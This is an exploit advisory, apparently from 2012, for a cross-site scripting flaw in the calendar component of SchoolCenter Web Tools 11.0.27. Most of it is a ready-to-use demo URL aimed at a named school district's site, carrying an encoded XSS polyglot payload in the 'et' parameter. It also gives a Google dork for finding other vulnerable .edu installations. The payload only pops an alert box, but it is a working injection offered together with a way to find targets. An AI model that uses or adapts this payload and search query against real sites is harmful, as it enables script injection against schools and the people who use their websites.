SchoolCenter Web Tools 11.0.27 Cross Site Scripting

`# Exploit Title: SchoolCenter Web Tools Version 11.0.27 Cross Site Scripting  
# Date: 11.04.2012  
# Author: Sony and Flexxpoint  
# Software Link: www.thinqed.com  
# Google Dorks: inurl:/education/components/calendar/ site:edu  
# Web Browser : Mozilla Firefox  
# Site : http://insecurity.ro  
# PoC:  
http://st2tea.blogspot.com/2012/04/schoolcenter-web-tools-version-11027.html  
..................................................................  
  
Well, we have xss in calendar.  
  
Demo:  
  
  
http://schoolctr.hebisd.edu/education/components/calendar/default.php?sectiondetailid=74&my_family=&d=4&m=4&y=2012&et=%27;alert%28String.fromCharCode%2888,83,83%29%29//\%27;alert%28String.fromCharCode%2888,83,83%29%29//%22;alert%28String.fromCharCode%2888,83,83%29%29//\%22;alert%28String.fromCharCode%2888,83,83%29%29//--%3E%3C/SCRIPT%3E%22%3E%27%3E%3CSCRIPT%3Ealert%28String.fromCharCode%2888,83,83%29%29%3C/SCRIPT%3Eday  
  
http://4.bp.blogspot.com/-iUHFDKmBpO8/T4W34sQCX4I/AAAAAAAAA8g/uKfMF4sIUrQ/s1600/xss.JPG  
  
etc..  
`